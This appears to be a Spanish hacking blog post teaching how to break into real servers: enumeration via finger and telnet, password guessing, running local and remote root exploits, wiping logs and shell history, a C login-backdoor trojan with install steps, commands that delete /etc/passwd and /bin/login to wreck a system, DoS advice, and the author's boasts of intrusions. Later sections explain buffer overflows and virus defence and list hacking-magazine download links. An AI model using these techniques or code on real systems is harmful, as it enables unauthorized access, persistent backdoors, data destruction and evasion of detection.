1- Introduccion

BUeno aquí les dejo el tutorialpara entrar en sistemas vulnerables

2- Como seleccionar un objetivo

Para buscar host www.netcraft.com por ejemplo:

*.edu
*.com
etc…

Recomendacion: Cuando nos dirigimos a un objetivo en concreto, es conveniento anotar toda la info que se saque del host en un archivo, eso es muy util.
Bueno como principal, para seleccionar un objetivo , tenemos que tener en cuenta varias cosas:
Tenemos alguna shell para hacer login a la victima??
Por que no lo vamos a hacer desde nuestra maquina sin tener una o dos shells , para que no salte nuestra ip.

Luego otro punto es saber de que es la web: Porno (En mi opinion hay que hacerlas mierda) , Alguna compañia , algun site del gobierno, alguna universidad, bueno hay que ver con quien nos metemos no les parece?

3-  Determinar que sistema operativo es…

Despues de tener en cuenta estas cosas hay que fijarse que sistema operativo usa, para saber con que atacar, por que no es igual un win que un linux, o me equivoco??
Para saber el sistema operativo hay varias maneras:
Una es hacer telnet host 23 , si el admin es muy lamer va a decir el verdadero sistema operativo, pero esto no es de confiar por que hay admins que tienen un dedo de frente y ponen informacion falsa, pero igual ya la opcion de usar telnet en vez de ssh me parece muy dobolu, pero bueno cada loco con su tema.
Otra forma es la de usar el Queso un programa de gran utilidad, o si no ir a www.netcraft.com y ahi fijarse el sistema operativo.
Tambien hay otra forma que es la de sacar el sistema operativo por el lpd, es una forma muy buena, esta forma la podemos encontrar en packetstorm.securify.com (Muy pero muy buen site, muy completo) asi se llama el texto osdetect-lpd.txt , leanlo por que es muy interesante.

4- Escanear un site

Luego de saber que sistema operativo es hay que saber que daemons usa, como hacemos esto, con nuestro gran amigo de aventuras NMAP, que lo bajamos de www.insecure.org/nmap
Entonces que hacemos escaneamos los puertos para saber cual tiene abierto.
Tambien otra cosa que es importante es sacar los ns , por ejemplo esto es muy util para saber
si el ftp, pop , www estan en una misma maquina todos o son varias , esto no va a ayudar a tener una idea del host.
Como hacemos para sacar el ns, de la siguiente manera:
nslookup host.com
con esto nos va a salir el ns por ejemplo: ns1.soyunns.com
Si les interesa un poco mas este tema de sacar los ns y toda esa bola hay un muy buen texto Analisis remoto de sistemas
por Nabster <verdeplanta12@hotmail.com>

5- Sacar info de los puertos abiertos y tratar de entrar

Luego de tenes los puertos que estan abiertos hacemos lo siguiente desde nuestra shell, telnet host puerto
lo que vamos a hacer es conectarnos a todos los puertos que esten abiertos y sacar todas las versiones de los daemons.
por ejemplo:

telnet host 21
telnet host 25
telnet host 79
telnet host 110
telnet host 109
telnet host 143
telnet host 119

etc…

luego de ya tener toda esa info ya tenemos una idea de que sistema operativo es ,  de los ns, de los puertos, ahora que hacemos ??? ahhh jejeje veamos que utilidad le podemos sacar a cada puerto

Puerto 21 Ftp luego de sacar la versión, ponemos ftp host luego cuando nos aparezca el login ponemos ftp guest , anonymous guest@mishuevos.com , guest anonymous , lo que hacemos es probar si se permite la cuenta de anonymous, si es asi y entramos ponemos ls -a para que nos liste los dir, entonces miramos los permisos de cada dir, si hay permisos de escritura anotamos en que dir, y nos vamos a www.hack.co.za o a packetstorm.securify.com y nos fijamos que exploit hay para esa version.

Puerto 79 El puerto del finger, el admin que tenga este puerto abierto es un verdadero lamah, por que este puerto lo que nos brinda son los usuarios de la maquina y la info de cada usuario, para aprovecharnos de este puerto hacemos lo siguiente, primero nos conectamos telnet host 79
y ponemos /w este comando lo que hace es decirnos quien esta conectado , si el root esta conectado no es conveniente meternos hasta que se vaya, pero lo que hacemos es fijarnos de que host viene el root, si nos dice console es que esta conectado directamente desde la maquina, pero si nos dice un host, es conveniente examinar ese host desde donde viene conectado el root, por que si uno llega a entrar a ese host y saca el root de ese host podemos sacar el pass del root del host donde nosotros queriamos entrar, poniendo un sniffer
Bueno si dice que no hay nadie conectado lo que tenemos que hacer es probar de poner nombres de usuarios por ejemplo: juan , jose , mfernandez, etc… todo lo que se nos ocurra, si no sacamos ninguno hacemos lo siguiente entramos a la web de ese host y nos fijamos si nos dice algun mail por ejemplo carlos@host.com , si encontramos un mail ya tenemos un user para probar en el finger, entonces lo que hacemos es telnet host finger y luego escribimos carlos + enter y nos fijamos que info sale si nos sale la info del usuario , juntamos toda la info que saquemos de los usuarios y la anotamos por ejemplo:

Trying 200.0.0.0
Connected to host.
Escape character is ‘^]’.
ventas

Welcome to Linux version 2.2.7 at host !

9:10am  up 1 day, 23:56,  2 users,  load average: 0.03, 0.02, 0.00

Login: ***                   Name: **** *****
Directory: /home/ventas                 Shell: /bin/bash
On since Sat Mar  3 09:00 (VET) on ttyp1 from nasa.gov.jejejej
New mail received Fri Mar  2 06:58 2011 (VET)
Unread since Wed Nov 22 13:16 2010 (VET)
No Plan.
Connection closed by foreign host.

user: ***
datos: ***

esta info nos sirve para sacar una shell por ejemplo hay muchos server, generalmente universidades, que tienen muchos usuarios y siempre hay alguno que usa claves faciles , entonces lo que hacemos es
telnet host 23 y cuando nos salga el login probamos todas las posibilidades como por ejemplo:
user: Paco
pass: Peñas

user: Paco
pass: Peñaz

user: Paco
pass: Ppeña

bueno probamos todas las posibilidades imaginables, si logramos entrar bien y sino no hay que desesperarse por que de ultimo recurso se puede concurrir a la fuerza bruta, que es probar con un programa usuarios y claves con una lista de palabras, pero si ya tenemos el usuario ya tenemos la mitad del trabajo echo por que solo nos falta sacar la clave jejeje pequeño detalle.

Puerto 110 es el puerto del pop para explotar alguna vulnerabilidad casi siempre hay que tener una shell si la tenemos , lo que tenemos que hacer es bajarnos el exploit y usarlo y nada mas.

bueno… y asi hay que hacer sucesivamente con todos los puertos, y hay que probar todos los exploit, si no lo lograron nos quedan todavia opciones no se preocupen.
Se puede escanear los cgi, hay muchos programas para escanear cgi, de nuevo vamos a packetstorm.securify.com y escaneamos todos los posibles cgi si encontramos alguno lo que tenemos que hacer es fijarnos que cgi es y ir a www.hack.co.za o a packetstorm y fijarnos como se explota, un ejemplo:

http://host/cgi-bin/nph-test?*

http://host/cgi-bin/nph-test?/home/*

lo que hace esto es listar directorios.

Si hicimos todo esto y nada funciona no nos desesperemos, por que todavia nos queda una posibilidad pero ya es muy dificil pero muy divertida , esta posibilidad es buscar nuestros exploits, mas adelante voy a explicar como buscar exploit locales, exploit remotos estoy aprendiendo jejeje

Ahora digamos que entramos al sistema
Entonces que hacemos ?
Sacar el root
entonces vamos a empezar a trabajar.
Como primer paso ponemos w para saber quien esta en el sistema, si esta el root nos conviene salir y entrar mas tarde.
Si no esta el root hay que sacar el root, entonces hacemos esto:

uname -a que nos va a decir el verdadero S.O , luego de tener esto buscamos los exploits para esas versiones y listo

6- Exploits locales

Una vez dentro de la maquina y sabiendo que sistema operativos es buscamos el exploit remoto una vez que lo tenemos lo tenemos que meter
en la maquina de la siguiente manera

tee cal.sh
luego de hacer eso ponemos
sh cal.sh
para ejecutar el exploit:

137$ sh cal.sh
Host [local] :local
Type a command  (max length=75),  for example   :
“echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd”
“mail leshka@leshka.chuvashia.su</etc/shadow”
<———————————–75————————————>
>echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd

138$ su r00t
# id

uid=0(root) gid=0(root) groups=0(root)

ven que facil
esto conviene probarlo en la maquina de uno y practicar, tambien hay que fijarse bien el codigo del exploit para ver como funciona y para que programa es dirigido para ver si ese programa se encuentra en el sistema.

Vamos a poner otro ejemplo pero ahora con un codigo en c

el exploit es para el vixie-crontab-3.0.1
y funciona en
RedHat Linux 6.0, RedHat Linux 5.2 , RedHat Linux 4.2
S.u.S.E. Linux 6.1 , S.u.S.E. Linux 6.0
entonces que hacemos tee archivo.c
gcc -O2 archivo.c -o archivo
luego ./archivo
crontab ./CrOn
luego esperamos un minuto
y ponemos crontab -r
luego de hacer esto si todo fue bien ya tenemos una shell de root creada, lo que tenemos que hacer es su -l cronexpl y poner el pass que nos dice en el exploit y listo.

facil no?

7- Exploits remotos

Estos quizas les paresca mas dificil de usar por que hay que jugar mucho con el offset a veces.
Vamos a dar un ejemplo de un exploit para el SCO para el httpd
desde nuestra shell subimos el exploit lo compilamos y ponemos lo siguiente:

sonyy:~ # (./s 0;cat) | netcat host 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)

y listo nos dio una shell nobody

No todos son tan faciles , este que puse es el mas facil de todos, hay otros que hay que jugar mucho con el offset y quizas este parcheado el bug y no funciona.

8- Borrar huellas

Bueno esta es una parte muy importante, de todo por que sin ella nos pueden agarrar, hay que tener en cuenta que si crackear un site lo mas facil es borrar los logs con el comando rm
por ejemplo:

rm /var/log/wtmp
rm /var/log/lastlog
etc…
y luego para no dejar mal el sistema
tee /var/log/wtmp
tee /var/log/lastlog

pero si queremos conservar el root sin que nos agarren hacemos lo siguiente, tenemos que usar zap, que son programas para borrar huellas editando los logs, esos programas los encontramos en packetstorm.

Tambien hay que borrar o editar el .bash_history o .sh_history
para que no vean lo que hiciste, despues tenemos tambien que borrar
los exploits que subimos.
y listo el crimen perfecto, y si es una pagina porno o algun gov o algun host que quieran crackear hay que buscar el index.html
entonces usamos el comando find.

Ahora digamos que este site es un site de pornografia infantil, y nosotros pensamos que eso esta mal (por lo menos yo si) asi que queremos crackearlo es relativamente facil: podemos hacer todas estas cosas, para que el sistema siga funcionando pero para que no puedan logearse ni arreglar el sistema asi que la unica forma de arreglarlo de reinstalando el sistema.
rm /etc/passwd
rm /etc/shadow
rm /bin/login
rm /bin/rm
rm /etc/inetd.conf
y por ultimo killall login y listo , no mas nos falta cerrar los daemons menos el httpd para que se vea el crack.

9- Como mantener el root(Troyanos)

Bueno digamos que no queremos crackear este sistema , asi que lo que queremos hacer es tener root siempre, sin que nos agarren, sin poner nombre de usuario sin poner clave , sin que nadie en el sistema se de cuenta que hay alguien en el sistema poniendo el comando who
lindo no?
Pudiendo logearse al sistema y si uno quiere poner una clave para que solo uno pueda entrar y que nos de una shell de root cada vez que se lo pedimos.
Bueno entonces a poner un troyano, para poner un troyano hay que tener root.
asi que vamos a usar este troyano:

/*
* Localcore (http://www.localcore.org) login backdoor.
* To trigger, you can either do:
* DISPLAY=MAGIC_WORD; export DISPLAY; telnet target-host
* or
* telnet
* env def DISPLAY MAGIC_WORD
* o target-host
*
* Installation: copy /bin/login to /usr/lib/login , chmod 755 it,
* copy this to /bin/login, chmod 4755 it and touch all timestamps.
*
* Change the MAGIC_WORD and such to taste your fit.
*/

#include <stdio.h>

/* start of user def stuff */
#define OLDLOGIN “/usr/lib/login”
#define LOGINNAME “login”
#define MAGIC_WORD “localhost”

/* end of user def stuff */

/* To make it a bit better looking in strings */

#define REVISION “$Id: Localcore 2000/08/14 21:31:00 marekm Exp $”

char **exe;

do_back() {
puts(REVISION);
putenv(“TERM=vt100″);
putenv(“HISTFILE=/dev/null”);
execl(“/bin/sh”,”sh”,”-i”,0);
}

main(argc, argv)
int argc;
char *argv[];
{
exe = argv;
exe[0] = LOGINNAME;
if ((char *)getenv(“DISPLAY”) != (char *)NULL)
if (strncmp(getenv(“DISPLAY”),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
do_back();
execv(OLDLOGIN,exe);
}

—————————————————————

Bueno para poner este exploit tenemos que hacer lo siguiente:
cp /bin/login /usr/lib/login
chmod 755 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
el exploit lo ponemos en /bin/login
chmod 4755 /bin/login
y luego hay que hacer un touch

Bueno lo que hicimos aca fue reemplazar el /bin/login por este troyano.
Si le queremos poner clave tenemos que modificar el codigo del troyano antes de compilarlo,
lo que tenemos que modificar es #define MAGIC_WORD “localhost”
en vez de localhost podemos la clave que querramos por ejemplo: Rd2MZ*a2d
linda clave no?? jejeje
Entonces luego de haber puesto el troyano nos salimos del host, habiendo borrado todas las huellas y habiendo dejado el sistema como estaba.
Y desde cualquier terminal ponemos la siguiente sintaxis:

export DISPLAY=”localhost”; telnet host

Trying 200.00.00.00…
Connected to host
Escape character is ‘^]’.

SCO OpenServer(TM) Release 5 (host) (ttyp0)

$Id: Localcore 2000/08/14 21:31:00 marekm Exp $
# id
uid=0(root) gid=3(sys) groups=3(sys),0(root),1(other)
#

aclaracion: ´´localhost´´ es la clave que no definimos, la que viene por default
entonces bueno ya ta tenemos root y nadie nos ve

10- Ataque D.o.S

Bueno el D.o.S son ataques de negacion de servicio, yo solo los practico contra paginas pornograficas, estos son programas como los que se usaron contra yahoo y amazon
lo que se hizo en esa ocacion fue desde varios host poner programas , programados para atacar a una determinada hora en un dia determinado.
para conseguir programas dos http://www.hack.co.za/dos/ddos/index.html
y luego para cada sistema operativo hay un atake distinto.
Bueno no hay mucho que decir en este punto.

11- Logs mios de como entre a varios lugares.

Por ejemplo un ejemplo del finger:

Señor X:~ #  telnet host 79
Trying 200.0.0.0
Connected to host.
Escape character is ‘^]’.
ventas

Welcome to Linux version 2.2.7 at host !

9:10am  up 1 day, 23:56,  2 users,  load average: 0.03, 0.02, 0.00

Login: ventas                           Name: ventas
Directory: /home/ventas                 Shell: /bin/bash
On since Sat Mar  3 09:00 (VET) on ttyp1 from nasa.gov.jejejej
New mail received Fri Mar  2 06:58 2001 (VET)
Unread since Wed Nov 22 13:16 2000 (VET)
No Plan.
Connection closed by foreign host.
Señor X:~ #
Señor X:~ # telnet host
Trying 200.00.00.0.
Connected to host
Escape character is ‘^]’.
Welcome to SuSE Linux 6.1 (i386) – Kernel 2.2.7 (ttyp2).
host login: ventas
Password:
Have a lot of fun…
You have new mail.
ventas@host:~ > cd /
ventas@host:/ > cd tmp
ventas@host:/tmp > tee cronexpl.c
ventas@host:/tmp > gcc -O2 cronexpl.c -o cronexpl
ventas@host:/tmp > ./cronexpl
ventas@host:/tmp > crontab ./CrOn
ventas@host:/tmp > crontab -r
ventas@host:/tmp > su -l cronexpl
Password:
host: #

listo root

ven que facil

vamos con otro ejemplo:

host: # (./s 0;cat) | netcat www.fuac.edu.co 457
id
uid=28(nouser) gid=28(nogroup) groups=28(nogroup)

bueno listo
ahora ya saben como funciona la cosa.

12- Como entre a www.***.com

Bueno aunque no lo crean fue muy facil, escanee los puertos , y encontre un bug en el rpc, esto no se lo dije a nadie hasta que lo parchee , ahora ya no funciona por lo menos el que yo use.
luego cambie la web, borre las huellas y crackee todos los pass: root etc… muy faciles
y luego me sali, no puse troyano ni nada , y la segunda vez que lo crackee use un exploit remoto que me dio una nobody y despues use un exploit local obtuve el root y luego seguí el mismo procedimiento.
La verdad ese admin no tiene ni puta idea de nada.

13- ¿Como descubrir exploit locales uno mismo?

Bueno esto es un tema apasionante , lo voy a tratar muy por arriba

Hay que aclarar que para conseguir una shell root el programa tiene que tener SUID, para saber que programa tiene suid se pueden bajar el programa check.pl de freshmeat.net
Ese programa es muy bueno
Bueno luego de saber que programas tienen SUID, hay que empezar a jugar con cada uno hasta que alguno cree un core.
como hacemos esto? con la siguiente sintaxis:

programa -language `perl -e ‘print “A”x1200′`

si esto sirve nos va a tirar un core

entonces ponemos gdb programa core
luego ponemos info registers
Y nos tiene que aparecer eip 4141414141
si nos aparece esto quiere decir que sobreescribe la pila
ahora lo que hay que hacer es hacer el exploit.
Si no saben programar o estan aprendiendo pueden hacer lo siguiente
bajarse exploit de www.hack.co.za y mirarlos y poner el programa de ustedes y empezar a jugar, antes hay que leer

Nabster.

Los programas que admiten datos de entrada con parámetros, los almacenan temporalmente en una zona de la memoria denominada búfer. Pero algunas funciones de lectura, como las strcpy() del lenguaje C, no admiten este tipo de desbordamiento y causan el bloqueo de la aplicación, lo que puede provocar la ejecución del código arbitrario y permitir el acceso al sistema.

La implementación de este tipo de ataques es extremadamente complicada ya que requiere un conocimiento exhaustivo de la arquitectura del programa y del procesador. Sin embargo, existen varios puntos vulnerables capaces de automatizar este tipo de ataques y de hacerlos accesibles para aquellos que son casi inexpertos.

Funcionamiento básico

El principio operativo de un desbordamiento de búfer guarda una relación muy estrecha con la arquitectura del procesador en la que se ejecuta una aplicación vulnerable.

Los datos ingresados en una aplicación se almacenan en la memoria de acceso aleatorio en una zona que se conoce como búfer. Un programa con un diseño correcto debería estipular un tamaño máximo para los datos de entrada y garantizar que no superen ese valor.

Las instrucciones y los datos de un programa en ejecución se almacenan temporalmente en forma adyacente en la memoria, en una zona llamada pila. Los datos ubicados después del búfer contienen una dirección de retorno (que se denomina puntero de instrucción) que le permite al programa continuar su tiempo de ejecución. Si el tamaño de los datos es mayor que el del búfer, la dirección de retorno se sobrescribe y el programa leerá una dirección de memoria no válida generando una violación de segmento en la aplicación.

Un pirata informático con un sólido conocimiento técnico puede asegurarse de que la dirección de memoria sobrescrita corresponda a una real, por ejemplo, una que esté ubicada en el mismo búfer. Como tal, al ingresar las instrucciones en el búfer (el código arbitrario), es fácil para él ejecutar este procedimiento.

Por lo tanto, es posible incluir instrucciones en el búfer que permitan abrir un intérprete de comandos (shell) permitiendo que el pirata tome control del sistema. Este código arbitrario que posibilita la ejecución del intérprete de comandos se conoce como código de shell o shellcode.

Protección contra el desbordamiento de búfer

Para protegerse contra este tipo de ataques, es importante desarrollar aplicaciones que utilicen lenguajes de programación avanzados que garanticen una administración precisa de la memoria asignada o que usen un lenguaje de bajo nivel con bibliotecas de función seguras (por ejemplo, las funciones strncpy()).

Los boletines de alerta se publican con frecuencia y advierten sobre la vulnerabilidad de ciertas aplicaciones a los ataques por desbordamiento de búfer. Después de su publicación, los editores de software afectados por la vulnerabilidad generalmente publican revisiones (patch) para corregir el problema. Es recomendable que todos los administradores de sistema y red se mantengan informados acerca de las alertas de seguridad y que apliquen las revisiones lo antes posible.

Nabster.

Nabster.

Cómo acceder a MySQL desde Visual C++ usando las API’s, paso a paso.

Este tutorial se encuentra en formato PDF y nos muestra, paso a paso, cómo crear una pequeña aplicación en Visual C++ 6.0 con acceso a una base de datos de MySQL sin usar ODBC.

Contenido del tutorial:

Paso 1: Crear el proyecto
Paso 2: Manos a la obra.
Paso 3: Configurar las rutas
Paso 4: Ajustar la configuración del proyecto.
Paso 5: Crear la base de datos
Paso 6: Escribir el código fuente
Paso 7: Establecer la conexión
Paso 8: Ejecutar la consulta.
Paso 9: Resultados

Descargar aquí: http://www.latindevelopers.com/files/6/mysqlapi.pdf

En este apartado propucarare explicar todo sobre los virus como evitarlos etc…

VIRUS Y TROYANOS

El objetivo de los virus, la mayoría de las veces es destructivo, pero no siempre. En ocasiones son obras maestras de la programación, que persiguen el reto de aprender o de demostrar los fallos de seguridad, de sistemas operativos o Internet. Programados en código máquina o diferentes códigos de programación, los virus son cada vez más potentes y afectan a más archivos, como lo demuestra hispasec (www.hispasec.com) con OUTLOOK.PDFWorm, el primer gusano que se presenta en un archivo PDF (Portable Document Format), el conocido formato de Adobe Acrobat.

Acceso Uno: Qué es un virus

-Programas creados con distintos lenguajes de programación o código de máquina (es el lenguaje más elemental que el ordenador es capaz de interpretar).Cuando se activa (previamente el usuario a ejecutado dicho virus, en forma de fichero con distintas extensiones ejecutables) el virus comienza su infección, entra en acción el código, que dependiendo de su programación, será más o menos destructivo, provocando problemas al sistema informático del usuario. Se comportan a veces de forma similar a los biológicos, aunque hay una diferencia muy clara. Los virus informáticos siempre se introducen en el sistema cuando el usuario los ejecuta. Por lo tanto si tenemos un antivirus actualizado y NO ejecutamos archivos de procedencia sospechosa, desconocida, podemos estar a salvo de estos virus con un porcentaje muy alto. Los biológicos es distinto, todos sabemos que nos podemos cuidar perfectamente y por el simple echo de respirar un aire acondicionado contaminado nos puede entrar un virus. Pero creadores de estos programas informáticos víricos, en ocasiones, podemos encontrar obras de “ingenieria social” que da lugar a que el usuario ejecute un virus sin practicamente darse cuenta. De este dato hablaremos más adelante en la sección de troyanos.

Acceso Dos: Como evitarlos

-Es conveniente tener un antivirus actualizado. Y cada vez que instalamos por ejemplo un programa desde disquete o CD-ROM u otro soporte, revisarlo con el antivirus. Algunos programas incluyen método heurístico y la posibilidad de analizar todos los ficheros. Si tenemos sospechas, es recomendable indicar estas opciones. El método heurístico busca cadenas sospechosas en los archivos, en busca de posibles virus que en ese momento son desconocidos.

-Tener precaución con el correo electrónico, con los ficheros adjuntos. No ejecutarlos si la procedencia es desconocida. Incluso si conocemos el destinatario, puede ser un virus pero esta persona NO tiene porque ser el responsable. Hay virus, en este caso denominados gusanos, que infectan el sistema de tal forma que se autoenvian a los contactos de la libreta de direcciones (sobre todo si utilizamos Outlook Express). Por lo tanto simplemente cada vez que nos envien un fichero adjunto, lo revisamos con el antivirus para evitarnos problemas.

-Hay muchos tipos de virus, pero para resumir se puede decir que cualquier fichero que se ejecute puede tener un código vírico, porque las técnicas de programación, estan avanzando cada vez mas. Los ficheros ejecutables más comunes que pueden tener código dañino son: .exe .com .js .bat .sys librerias de windows .dll archivos .html .doc (de microsoft word los famosos virus de “macro”) archivos .html con código en JavaScript o insertado con controles ActiveX…Incluso ficheros con extension .sam (AmiPro) y ficheros .src (los “salvapantallas” o protectores de pantalla) y como indicaba al principio ficheros PDF y prácticamente la extensión de los archivos va en aumento.Tambien son conocidos virus que afectan a CorelDraw y troyanos que hablaremos a continuacion que se propagan a traves del programas de chat (el mas conocido mIRC) o a traves de los ficheros ejecutables que he indicado.

Para concluir el “acceso dos” se podría decir que teniendo un antivirus actualizado con protección para Internet (ya he indicado que hay virus .html extension de ficheros web y programados en java) y tenemos precaución en no ejecutar ficheros sospechosos, podemos evitar dichos “programas viricos” (pero al 100 es complicado…)

Acceso Tres: ¿Qué son los troyanos?

No son virus como tales, pero pueden realizar acciones destructivas como algunos virus. Los más peligrosos constan de dos programas, un servidor y un cliente. El servidor es por ejemplo nuestro Ordenador (para hacernos una idea) y el cliente es el usuario que intenta “entrar” en nuestro Ordenador, una vez que ha entrado, en función de las características de dicho troyano, puede borrar archivos de nuestro disco duro, formatearlo, abril la unidad de cd-rom, realizar capturas de nuestro escritorio, de lo que tecleamos, hay troyanos que “copian” el archivo .PWL que es donde el sistema windows guarda las contraseñas y las envia a una dirección de correo electrónico.

Un troyano muy conocido es Back Orifice conocido como BO. Creado por el grupo “Cult of the Dead Cow” (culto a la vaca muerta). Está en la lista “In The Wild” que es una recopilación de los virus o troyanos más importantes y que más propagación han tenido. Sus autores quieren demostrar los fallos de seguridad de win 95/98.Y muy conocido es NetBus y SubSeven que disponen de varias versiones. BO incluso tiene “plugins” para mejorar sus acciones.

Acceso Cuatro: Como evitar a Back Orifice

La aplicación netstat nos pude ser de gran ayuda. Sirve para darnos información del protocolo TCP/UDP y TCP/IP. Este comando con -a nos da información de todas las conexiones y puertos en escucha Para comprobar si tenemos el troyano Back Orifice, desde MS_DOS por ejemplo, tecleamos: netstat -an |find “UDP” Si la información que nos da es la siguiente: UDP 0.0.0.0:31337 *.* podemos tener la seguridad que tenemos instalado el servidor de “Back Orifice” en nuestro Ordenador. También, con la orden desde ms-dos netstst -an te da toda la información, prueba dichas ordenes y verás todos tus puertos (mientras estas conectado a internet). Por ejemplo el troyano NetBus utiliza el puerto TCP 12345. En la web: http://www.hispasec.com tienes más información de cómo evitar este tipo de programas. Son analizados otros troyanos conocidos como NetBus y DeepThroat.

Estos “Caballos de troya” suelen estar contenidos en programas ejecutables y a traves de chat, por ejemplo mIRC nos pueden enviar este tipo de “programas”, o a traves de ICQ (cuidado con la seguridad de dicho programa). Normalmente se quedan residentes en memoria y se introduce código en el registro de windows para que cada vez que encendamos el Ordenador lo tengamos “activo”.

Como hackear by Como hackear is licensed under a Creative Commons Reconocimiento-No comercial-Sin obras derivadas 2.5 España License.
Based on a work at allabouthack.wordpress.com.
Permissions beyond the scope of this license may be available at http://allabouthack.wordpress.com.

Bueno aquí de nuevo publico este articulo , respetando derechos de autor lo encontré en un foro llamado forohack estube leyendo me descargue las revistas y son interesantes de tal modo que las publicaré aquí.

Esta no es una revista más, por primera vez tenéis ante vosotros una publicación LIBRE que os ofrecerá la posibilidad de explorar la red tal y como debe explorarse
Esta publicación responde a la pregunta más veces expuesta en LA RED: ¿Cómo puedo ser un hacker?
Nuestro objetivo es: ACABAR CON LA BASURA DE LA RED (lamers y demás “esencias” ) con el único método que conocemos: LA EDUCACIÓN y con una única bandera que será por siempre nuestra firma: SOLO EL CONOCIMIENTO TE HACE LIBRE.

Estos son nuestros pilares: LA EDUCACIÓN Y EL CONOCIMIENTO. Para ser un HACKER solo hace falta dos cosas: curiosidad y medios, a partir de ahora la curiosidad deberéis ponerla VOSOTROS, porque los medios los facilitaremos NOSOTROS. En las siguientes líneas os descubrimos cómo podremos conseguir nuestros objetivos y definimos algunas de las palabras que más han sido violadas y retorcidas en su significado.

Hacker: Este término ha sufrido a lo largo de su corta historia una horrible conspiración perpetrada por la ignorancia de los medio, eso que personalmente llamo “periodismo de telediario” (en clara alusión a los ridículos artículos que no hacen más que intoxicar nuestra percepción de las cosas e insultar nuestra inteligencia). Este tipo de periodismo unido a “otros poderes”, desde los monopolios que deben justificar su incompetencia hasta los gobiernos que deben justificar sus intereses ocultos pasando por la industria del cine y los medios informativos “de masas”.

Pues bien, HACKER no es más que una persona que posee conocimientos avanzados sobre una materia en concreto, normalmente relacionados con la tecnología aunque ni mucho menos limitado a elllo. Ponen sus aptitudes al servicio de un único objetivo: EL CONOCIMIENTO. Desean conocer el funcionamiento de “las cosas” y no encuentran límites en su camino más que su propia curiosidad. No se dedican a destruir ni a causar estragos entre sus “victimas”, no se dedican a robar ni a chantajear ni a regodearse de sus “conquistas”, muy al contrario suelen advertir a terceros de las debilidades de sus sistemas y, desgraciadamente, esos “terceros” en lugar de agradecerles su aviso se dedican a denunciarlos o perseguirlos…. aunque no siempre es así, por supuesto, muchas compañias y gobiernos han aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores (o empleados) de estos. BILL GATES es un HACKER (el papá ventanas), como Linus Torvalds (el papá Linux) o Grace Hooper (la Almirante, creadora del lenguaje COBOL), los autores del COREWAR, Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky (precursores de los creadores de virus informáticos), y muchos más. ¿Cómo? ¿Pero no hemos dicho que los hackers no cometen delitos? Pues NO, vuelve a leer su definición…..pero claro, de todo hay en la viña del señor y al igual que hay delincuentes entre el clero hay hackers que en un momento u otro han caído en la ilegalidad, nadie es perfecto!!! ….. y Bill Gates es un HACKER? Por supuesto, solo tienes que leerte su biografía. ¿Sorprendido? Espero que no, porque eso no es nada más que un cero a la izquierda en comparación con lo que vas a encontrar en esta revista.

En vez de juntar todos los números en un único, o dos o tres archivos, las he puesto para descargar una por una por si hay alguien que quiere bajarse unos números determinados, aunque es recomendable bajarse todos los números

en mi opinión y en la de muchos es la mejor revista para aprender hacking, ya que explica las cosas de manera sencilla, y en principio no muy técnica, para que vayas asimilando conceptos poco a poco, y que luego a la hora de tener que leer artículos realmente técnicos y pesados de leer te sea mucho más fácil comprenderlos.

Ningún libro en la red puede enseñarte lo que se enseña aquí de la manera sencilla en que es explicado, muy útil tambien para los que buscan seguridad en internet, por aquello, de ver bajo la mirada del enemigo, si aprendes a mirar a tu sistema, de la manera en que lo ve un hacker, te será mucho más fácil de proteger que cómo lo haces ahora con un antivirus y un cortafuegos, que pueden ser saltados con suma facilidad! todo eso y mucho más aquí lo aprenderás, aquí comparto con vosotros pues los 30 números de hackxcrack, y en el número 30 número va incluído en un documenteo de texto el foro actual al que puedes dirigir tu consultas según hagas los ejercicios de esta revista, no se puede pedir más…….

EN ESTE POST ESTAN LOS LINKS EN UNA CUENTA PREMIUM EN RAPIDSHARE (NO CADUCAN LOS ENLACES NUNCA)Descarga las revistas de HackXCraCk aki!! Link’s resubidos con cuenta Premium!!

Cuaderno 1:

-Crea tu primer troyano indetectable por los antivirus
-FXP:sin limite de velocidad, utilizando conexiones ajenas
-Los secretos del FTP
-Esquivando firewalls
-Pass mode versus port mode

http://rapidshare.com/files/416505/C…k_Numero_1.rar

Cuaderno 2:
-Code/decode bug (como hackear servidores paso a paso)
-Ocultacion de ip: primeros pasos
-Aznar al frente de la gestapo digital

http://rapidshare.com/files/459550/C…mero_2.pdf.rar

Cuaderno 3:
-Ocultando nuestra ip, encadenando proxys
-proxy: ocultando todos nuestros programas tras las cadenas de proxies
-practicas de todo lo aprendido

http://rapidshare.com/files/1734178/…k_Numero_3.rar

Cuaderno 4:
-Crea tu segundo troyano indetectable e inmune a los antivirus
-Radmin: remote administrator 2.1, un controlador remoto a medida

http://rapidshare.com/files/461740/C…mero_4.pdf.rar

Cuaderno 5:
-Aprende a compilar, paso obligado antes de explicarte los exploits
-Rootkits, sin defensa posible
-penetracion de sistemas por netbios
-compilacion del netcat con opciones “especiales”
-netbios: un agujero de seguridad no reconocido por microsoft
-La pirateria en internet

http://rapidshare.com/files/464620/C…k_Numero_5.rar

Cuaderno 6:
-Curso de visual basic: aprende a programar desde 0
-Ficheros Stream (invisibles, peligrosos y ejecutables)
-Rippeando videos Divx, El rey
-Ocultacion avanzada de ficheros en windows xp
-Listado de puertos y Servicios: imprescindible!!!
-IPHXC: El tercer troyano de hack x crack (parte 1)
-Trasteando con el hardware de una lan

http://rapidshare.com/files/466514/C…k_Numero_6.rar

Cuaderno 7:
-Apache, El mejor servidor web- transforma tu pc en un servidor web
-El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones
-IPHXC (segunda parte) nuestro tercer troyano
-La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correo
Los primeros pasos con IRIS (sniffando la red)
-Accede por Telnet a servidores POP3, entendiendo los protocolos
-Curso de visual basic, segunda entrega
-Rippeando (2ª parte) el audio: AC3 — MP3 –OGG
-Consigue una cuenta POP3 gratis

http://rapidshare.com/files/468994/C…k_Numero_7.rar

Cuaderno 8:
-Linux: Netcat Perl “pipes”
-Reverse shell, burlando al firewall
-Encadenando programas
-Penetracion inversa en PCs remotos
-SMTP: descubre los protocolos de internet
-Apache: Configuracion, comparte ficheros desde tu propio servidor web
-Jugando de nuevo con el NETCAT
-SERIE RAW: protocolos
